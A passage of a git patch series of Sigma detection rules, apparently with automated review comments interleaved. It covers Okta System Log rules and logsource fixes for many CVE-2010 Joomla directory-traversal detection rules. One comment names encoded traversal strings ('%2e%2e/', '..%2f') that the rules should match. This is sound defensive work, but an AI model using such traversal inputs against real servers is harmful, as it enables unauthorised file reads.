@@ -14,16 +12,12 @@ logsource: detection: selection: eventtype: - - - - - displaymessage: - - - - + - policy.rule.update + - policy.rule.delete condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From 249d3198d33dd723d5554372162c2bea191f9213 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:27:45 -0500 Subject: [PATCH 0917/1367] Create okta_application_sign-on_policy_modified_or_deleted.yml --- ...ion_sign-on_policy_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml new file mode 100644 index 00000000..47fd37e7 --- /dev/null +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Okta Application Sign-On Policy Modified or Deleted +id: Application Sign-On Policy +description: Detects when an application Sign-on Policy is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - application.policy.sign_on.update + - application.policy.sign_on.rule.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown From bec7b5d3e79a8dfed0d526c9f159aa0cd5c47550 Mon Sep 17 00:00:00 2001 
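Review bot: The selection lists `policy.rule.update` and `policy.rule.delete` but not the deactivation event, which is how a rule is usually switched off without deleting it; `- policy.rule.deactivate` belongs in the list if Okta emits it (confirm against the cited event-types reference). Whole-policy changes (`policy.lifecycle.*`) are not covered either, which is fine for a rule titled "Policy Rule" but worth stating in the description so nobody assumes otherwise. `falsepositives: - Unknown` should mention that policy rules are routinely edited by Okta administrators.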
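Review bot: The two event types sit at different levels of the policy: `application.policy.sign_on.update` is a policy-level event while `application.policy.sign_on.rule.delete` is a rule-level one, so as written the rule misses rule updates and policy deletions; if both levels are intended the list should probably hold all four (`application.policy.sign_on.update`, `application.policy.sign_on.delete`, `application.policy.sign_on.rule.update`, `application.policy.sign_on.rule.delete`), confirmed against the Okta event-types reference. `id: Application Sign-On Policy` is not a UUID (corrected later in the series, PATCH 0922) and should be generated here. `falsepositives: - Unknown` should note that sign-on policies are changed by Okta administrators during normal application rollout.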
From: Austin Songer Date: Sun, 12 Sep 2021 20:33:27 -0500 Subject: [PATCH 0918/1367] Create okta_security_threat_detected.yml --- .../okta/okta_security_threat_detected.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 rules/cloud/okta/okta_security_threat_detected.yml diff --git a/rules/cloud/okta/okta_security_threat_detected.yml b/rules/cloud/okta/okta_security_threat_detected.yml new file mode 100644 index 00000000..1284f8c9 --- /dev/null +++ b/rules/cloud/okta/okta_security_threat_detected.yml @@ -0,0 +1,19 @@ +title: Okta Security Threat Detected +id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 +description: Detects when an security threat is detected in Okta. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: security.threat.detected + condition: selection +level: medium +falsepositives: + - None From 1f5e2577cbbdd4b2bd9f3a633a2f6529950c1355 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:34:37 -0500 Subject: [PATCH 0919/1367] Delete okta_user_account_mfa_reset.yml --- .../okta/okta_user_account_mfa_reset.yml | 29 ------------------- 1 file changed, 29 deletions(-) delete mode 100644 rules/cloud/okta/okta_user_account_mfa_reset.yml diff --git a/rules/cloud/okta/okta_user_account_mfa_reset.yml b/rules/cloud/okta/okta_user_account_mfa_reset.yml deleted file mode 100644 index ca73d4f7..00000000 --- a/rules/cloud/okta/okta_user_account_mfa_reset.yml +++ /dev/null 
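Review bot: `security.threat.detected` is only written to the System Log when Okta ThreatInsight is configured to log (the first reference is the page describing exactly that), so the description should say so, e.g. `description: Detects when Okta ThreatInsight flags a security threat. Requires ThreatInsight logging to be enabled in the Okta admin console.`; otherwise the rule silently matches nothing. `falsepositives: - None` is a stronger claim than the surrounding rules make with `- Unknown`, and ThreatInsight is itself a heuristic detector, so `- Unknown` or a note on tuning is more honest. The rule also has no `tags:` block, unlike every other rule in this series. Finally, `an security threat` should be `a security threat`.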
@@ -1,29 +0,0 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an -author: Austin Songer -status: experimental -date: 2021/ -references: - - https://developer.okta.com/docs/reference/api/system-log/ - - https://developer.okta.com/docs/reference/api/event-types/ -logsource: - service: okta -detection: - selection: - eventtype: - - - - - displaymessage: - - - - - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 01c985b99adddf66d6a7cba9b0e9e5aa9b5b9a1b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:40:33 -0500 Subject: [PATCH 0920/1367] Update and rename okta_user_account_mfa_bypass_attempt.yml to okta_mfa_reset_or_deactivated.yml --- .../okta/okta_mfa_reset_or_deactivated.yml | 22 ++++++++++++++ .../okta_user_account_mfa_bypass_attempt.yml | 29 ------------------- 2 files changed, 22 insertions(+), 29 deletions(-) create mode 100644 rules/cloud/okta/okta_mfa_reset_or_deactivated.yml delete mode 100644 rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml diff --git a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml new file mode 100644 index 00000000..ba789082 --- /dev/null +++ b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml 
@@ -0,0 +1,22 @@ +title: Okta MFA Reset or Deactivated +id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 +description: Detects when an attempt at deactivating or resetting MFA. +author: Austin Songer +status: experimental +date: 2021/09/21 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - user.mfa.factor.deactivate + - user.mfa.factor.reset_all + condition: selection +level: medium +tags: + - attack.persistence +falsepositives: + - If a MFA reset or deactivated was performed by a system administrator. diff --git a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml deleted file mode 100644 index ca73d4f7..00000000 --- a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml +++ /dev/null @@ -1,29 +0,0 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an -author: Austin Songer -status: experimental -date: 2021/ -references: - - https://developer.okta.com/docs/reference/api/system-log/ - - https://developer.okta.com/docs/reference/api/event-types/ -logsource: - service: okta -detection: - selection: - eventtype: - - - - - displaymessage: - - - - - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From e1ef3857fb53787457b0c8cb07b390be50196b45 Mon Sep 17 00:00:00 2001 
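Review bot: `description: Detects when an attempt at deactivating or resetting MFA.` is a sentence fragment; `description: Detects an attempt to deactivate or reset a user's MFA factors.` reads correctly, and the falsepositives line should be `- MFA factors being reset or deactivated by a system administrator or help desk.` `date: 2021/09/21` is nine days after this commit's own date (12 Sep 2021 in its header) and should be the creation date. Removing MFA factors maps to T1556 (Modify Authentication Process), which spans Persistence, Defense Evasion and Credential Access, so `attack.persistence` alone is incomplete; adding `- attack.t1556` would make the mapping explicit.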
From: Austin Songer Date: Sun, 12 Sep 2021 20:49:44 -0500 Subject: [PATCH 0921/1367] Update and rename okta_user_account_lockout.yml to okta_user_account_locked_out.yml --- ...ser_account_lockout.yml => okta_user_account_locked_out.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/cloud/okta/{okta_user_account_lockout.yml => okta_user_account_locked_out.yml} (93%) diff --git a/rules/cloud/okta/okta_user_account_lockout.yml b/rules/cloud/okta/okta_user_account_locked_out.yml similarity index 93% rename from rules/cloud/okta/okta_user_account_lockout.yml rename to rules/cloud/okta/okta_user_account_locked_out.yml index 92fd1081..0b5c5930 100644 --- a/rules/cloud/okta/okta_user_account_lockout.yml +++ b/rules/cloud/okta/okta_user_account_locked_out.yml @@ -1,4 +1,4 @@ -title: Okta User Account Lock out +title: Okta User Account Locked Out id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a description: Detects when an user account is locked out. author: Austin Songer From 18223a37cde617bcd55fcad60370208893c93e04 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 13 Sep 2021 06:26:01 +0200 Subject: [PATCH 0922/1367] Update okta_application_sign-on_policy_modified_or_deleted.yml --- .../okta_application_sign-on_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml index 47fd37e7..3b067027 100644 --- a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -1,5 +1,5 @@ title: Okta Application Sign-On Policy Modified or Deleted -id: Application Sign-On Policy +id: 8f668cc4-c18e-45fe-ad00-624a981cf88a description: Detects when an application Sign-on Policy is modified or deleted. author: Austin Songer status: experimental 
From e4d3d313c7546e8b59adc0aa69015d13fa95bdec Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 13 Sep 2021 06:33:49 +0200 Subject: [PATCH 0923/1367] Update okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 81cbea62..0cc96a97 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -1,5 +1,5 @@ title: Okta Policy Rule Modified or Deleted -id: 0c97c1d3-4057-45c9-b148-1de94b631931v +id: 0c97c1d3-4057-45c9-b148-1de94b631931 description: Detects when an Policy Rule is Modified or Deleted. author: Austin Songer status: experimental From 8e1f36ec3997404c989ad65da9f837ec2673ab1f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 23:34:08 -0500 Subject: [PATCH 0924/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index a4a49a16..99bff4e8 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -18,3 +18,4 @@ tags: - attack.persistence falsepositives: - Unknown + From 4ae1d4198357afdf31e0c4195c5d8ddbeb24a405 Mon Sep 17 00:00:00 2001 
From: pbssubhash Date: Mon, 13 Sep 2021 10:16:02 +0530 Subject: [PATCH 0925/1367] Corrected Rules - Logsource --- ...web_cve-2010-0943_exploitation_attempt.yml | 4 +++- ...web_cve-2010-0944_exploitation_attempt.yml | 4 +++- ...web_cve-2010-0985_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1219_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1304_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1305_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1306_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1307_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1308_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1312_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1313_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1314_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1345_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1353_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1354_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1470_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1471_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1472_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1473_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1474_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1475_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1476_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1494_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1495_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1532_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1533_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1534_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1535_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1601_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1602_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1607_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1657_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1659_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1714_exploitation_attempt.yml | 4 +++- 
...web_cve-2010-1717_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1718_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1719_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1722_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1875_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1953_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1954_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1955_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1956_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1979_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1980_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1981_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1983_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2033_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2034_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2035_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2036_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2122_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2259_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2307_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2682_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2861_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2920_exploitation_attempt.yml | 4 +++- ...web_cve-2010-3426_exploitation_attempt.yml | 4 +++- ...web_cve-2010-4231_exploitation_attempt.yml | 4 +++- ...web_cve-2010-4617_exploitation_attempt.yml | 4 +++- ...web_cve-2010-5278_exploitation_attempt.yml | 4 +++- ...web_cve_2010_5278_exploitation_attempt.yml | 24 ------------------- .../sysmon_detect_powerup_dllhijacking.yml | 4 ++-- 63 files changed, 185 insertions(+), 87 deletions(-) delete mode 100644 rules/web/web_cve_2010_5278_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yml b/rules/web/web_cve-2010-0943_exploitation_attempt.yml index e36f9ca0..fb5bfcbf 100644 --- a/rules/web/web_cve-2010-0943_exploitation_attempt.yml 
+++ b/rules/web/web_cve-2010-0943_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-0943 Exploitation Attempt -id: 3b8a0723-2e41-43ef-b56a-0ebf5859871c +id: f28d6faa-4163-4967-b397-414aab6cbe41 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_jashowcase - Directory Traversal:Directory tr in a jashowcase action to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yml b/rules/web/web_cve-2010-0944_exploitation_attempt.yml index caf28629..f33fd3a7 100644 --- a/rules/web/web_cve-2010-0944_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-0944_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-0944 Exploitation Attempt -id: 9a6621c8-26ce-4fa1-a081-5092a31df9f1 +id: 55d082fa-118a-4649-8e06-bf342de0ba84 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_jcollection - Directory Traversal:Directory t to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yml b/rules/web/web_cve-2010-0985_exploitation_attempt.yml index 41d2adcf..22a45c28 100644 --- a/rules/web/web_cve-2010-0985_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-0985_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-0985 Exploitation Attempt -id: 65eb9e0e-d8ea-4dbb-bdb1-8a7bfe726218 +id: 624c389f-24aa-44c2-b702-c2b58eb18ff9 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental 
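Review bot: The hunk replaces the rule's `id` with a new UUID, but the commit subject ("Corrected Rules - Logsource") gives no reason; ids are the stable key consumers use to track and suppress rules, so if the old ids collided or were invalid, say so in the commit message, and keep the old ones if they were merely regenerated. Sigma rules that change after creation also normally carry a `modified:` date; with `date: 2021/08/25` left as-is, a line `modified: 2021/09/13` would record this change.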
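Review bot: The `c-uri|contains` values this rule matches are outside the hunk, but the description says the vulnerability is a `..` traversal in a query parameter, and web server logs usually record the request URI as the client sent it, so the values should also cover the URL-encoded forms (`%2e%2e/`, `..%2f`) or the description should say that only the literal `../` form is matched. `category: webserver` is the correct logsource for a rule keyed on `c-uri`; without it the rule could not be converted by any backend, which is presumably why this commit exists. The same two-line addition is repeated for every rule in this commit, and this note applies to all of them.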
@@ -9,6 +9,8 @@ description: Joomla! Component com_abbrev - Local File Inclusion:Directory trave dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yml b/rules/web/web_cve-2010-1219_exploitation_attempt.yml index 70470533..4a23c671 100644 --- a/rules/web/web_cve-2010-1219_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1219_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1219 Exploitation Attempt -id: 5c13b413-1c5d-471e-b5d0-502d67c2cfff +id: c05d288c-1f70-4090-8f86-9739afedb14b author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_janews - Local File Inclusion:Directory trave to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yml b/rules/web/web_cve-2010-1304_exploitation_attempt.yml index e90d45b9..f848a240 100644 --- a/rules/web/web_cve-2010-1304_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1304_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1304 Exploitation Attempt -id: b9f646f1-1e8d-4213-a122-e8cfb2526f7e +id: 6bc9b1ee-a560-4944-84d7-02d45d99cdb1 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component User Status - Local File Inclusion:Directory trav the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yml b/rules/web/web_cve-2010-1305_exploitation_attempt.yml index e1fd2002..77a6a40c 100644 --- a/rules/web/web_cve-2010-1305_exploitation_attempt.yml 
+++ b/rules/web/web_cve-2010-1305_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1305 Exploitation Attempt -id: b80d67c0-e544-463e-8db0-cfa6fd1062c7 +id: 4c450e3e-b786-4bf6-bbf4-f2f44546d61e author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -10,6 +10,8 @@ description: Joomla! Component JInventory 1.23.02 - Local File Inclusion:Directo to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yml b/rules/web/web_cve-2010-1306_exploitation_attempt.yml index b3c45a34..1d0a373d 100644 --- a/rules/web/web_cve-2010-1306_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1306_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1306 Exploitation Attempt -id: 18655982-0c25-41ca-99a9-66c081e5c28e +id: 613ccec4-9812-4cc7-a2f5-bf88383cf83d author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Picasa 2.0 - Local File Inclusion:Directory trave controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yml b/rules/web/web_cve-2010-1307_exploitation_attempt.yml index a0c1b093..cff57926 100644 --- a/rules/web/web_cve-2010-1307_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1307_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1307 Exploitation Attempt -id: 1f6127b7-58d0-428e-afd6-3daa7093f500 +id: d2bcd27a-de8c-465b-889a-62588138feaa author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental 
@@ -9,6 +9,8 @@ description: Joomla! Component Magic Updater - Local File Inclusion:Directory tr to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yml b/rules/web/web_cve-2010-1308_exploitation_attempt.yml index 5e7dfeb6..52c29e67 100644 --- a/rules/web/web_cve-2010-1308_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1308_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1308 Exploitation Attempt -id: e7fa765b-d565-42e4-b03e-44a52a25c00a +id: 4cf2d8e5-2b82-484e-b412-bb5fcfb519eb author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component SVMap 1.1.1 - Local File Inclusion:Directory trav to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yml b/rules/web/web_cve-2010-1312_exploitation_attempt.yml index 4d863fd3..65aa281a 100644 --- a/rules/web/web_cve-2010-1312_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1312_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1312 Exploitation Attempt -id: ffb67143-f136-490b-a593-abc36e0a2f44 +id: fc07dc98-780f-4493-98ce-6e1b7c9742e2 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component News Portal 1.5.x - Local File Inclusion:Director the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yml b/rules/web/web_cve-2010-1313_exploitation_attempt.yml index d132790f..cc836644 100644 --- a/rules/web/web_cve-2010-1313_exploitation_attempt.yml 
+++ b/rules/web/web_cve-2010-1313_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1313 Exploitation Attempt -id: 73c88bfc-5e2a-4fac-b2b2-01b29b565d09 +id: 4287d3e9-5ba8-4a00-925b-bce992e8b2d5 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion:Direct to read arbitrary files via a .. (dot dot) in the view parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yml b/rules/web/web_cve-2010-1314_exploitation_attempt.yml index 57b4b947..22c062b9 100644 --- a/rules/web/web_cve-2010-1314_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1314_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1314 Exploitation Attempt -id: bab4e9de-2dab-4471-914b-319ddf29735f +id: 0ce79c5d-cb0c-4800-a040-a0c8c7ad45d1 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Highslide 1.5 - Local File Inclusion:Directory tr parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yml b/rules/web/web_cve-2010-1345_exploitation_attempt.yml index 1a75fecb..e03153f1 100644 --- a/rules/web/web_cve-2010-1345_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1345_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1345 Exploitation Attempt -id: 8e52016c-f42b-4d53-9812-5079fa88bb9a +id: b92bc21b-e649-4695-8f7c-8b881e33ed1c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental 
@@ -9,6 +9,8 @@ description: Joomla! Component Cookex Agency CKForms - Local File Inclusion:Dire the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yml b/rules/web/web_cve-2010-1353_exploitation_attempt.yml index 978f2bd2..17d6462a 100644 --- a/rules/web/web_cve-2010-1353_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1353_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1353 Exploitation Attempt -id: 58e30700-499a-4d21-9c7b-8727e5f8b6e7 +id: 3a9f4835-3518-40e9-91bc-ebb1d918c055 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -8,6 +8,8 @@ description: Joomla! Component LoginBox - Local File Inclusion:Directory travers attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yml b/rules/web/web_cve-2010-1354_exploitation_attempt.yml index 86e14aa8..0c88d17b 100644 --- a/rules/web/web_cve-2010-1354_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1354_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1354 Exploitation Attempt -id: 9d0cfe31-7ead-4c4c-8b33-b77c2a42ca24 +id: 841e7037-c68e-40d1-9fd4-d08fee87f124 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component VJDEO 1.0 - Local File Inclusion:Directory traver to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yml b/rules/web/web_cve-2010-1470_exploitation_attempt.yml index a3480662..00e0319d 100644 
--- a/rules/web/web_cve-2010-1470_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1470_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1470 Exploitation Attempt -id: 3dcb67ad-1b33-4721-8386-7cfccd0e3684 +id: 91dcce8a-b0dc-49e8-a766-9bd0d234d397 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Web TV 1.0 - Local File Inclusion:Directory trave a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yml b/rules/web/web_cve-2010-1471_exploitation_attempt.yml index 8043e1a0..af7e60db 100644 --- a/rules/web/web_cve-2010-1471_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1471_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1471 Exploitation Attempt -id: ae585c7e-f75e-4b76-b7cd-a7c3eed7065f +id: c25e9c8b-5bc3-4eda-a29e-62ed09349442 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Address Book 1.5.0 - Local File Inclusion:Directo controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yml 